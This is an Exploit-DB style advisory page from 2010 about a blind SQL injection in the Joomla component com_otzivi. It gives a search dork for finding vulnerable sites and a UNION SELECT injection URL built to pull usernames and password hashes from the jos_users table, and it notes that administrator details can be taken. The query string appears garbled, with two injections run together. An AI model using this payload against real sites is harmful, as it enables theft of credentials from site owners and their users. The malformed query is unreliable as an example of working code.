Joomla! Component com_otzivi - Blind SQL Injection

EDB-ID:

10966

CVE:

N/A




Platform:

PHP

Date:

2010-01-03


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

<------------------- header data start ------------------- >
#############################################################
#        Joomla Component com_otzivi Blind SQL Injection Vulnerability
#############################################################
# Author          : Cyber_945
# Home            : Ar-ge.Org
# Greetz          : By.Danger,D3xer,LionTurk and All Ar-ge.Org Members
# Not3            : Ar-ge.Org Online
# Name            : com_otzivi
# Bug Type        : Blind SQL Injection
# Infection       : Adminin bilgileri alinabilir.
  Dork :          : inurl:/index.php?option=com_otzivi

#############################################################
=======================C=y=b=e=r=_=9=4=5================
< 


-- bug code start -- >
http://server/index.php?option=com_otzivi&Itemid=15+and+1=2+union+select+concat(id,0x3a,username,0x3a,password),1+from+jos_users7,8,concat(username,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/from/**/jos_users--

=======================C=y=b=e=r=_=9=4=5================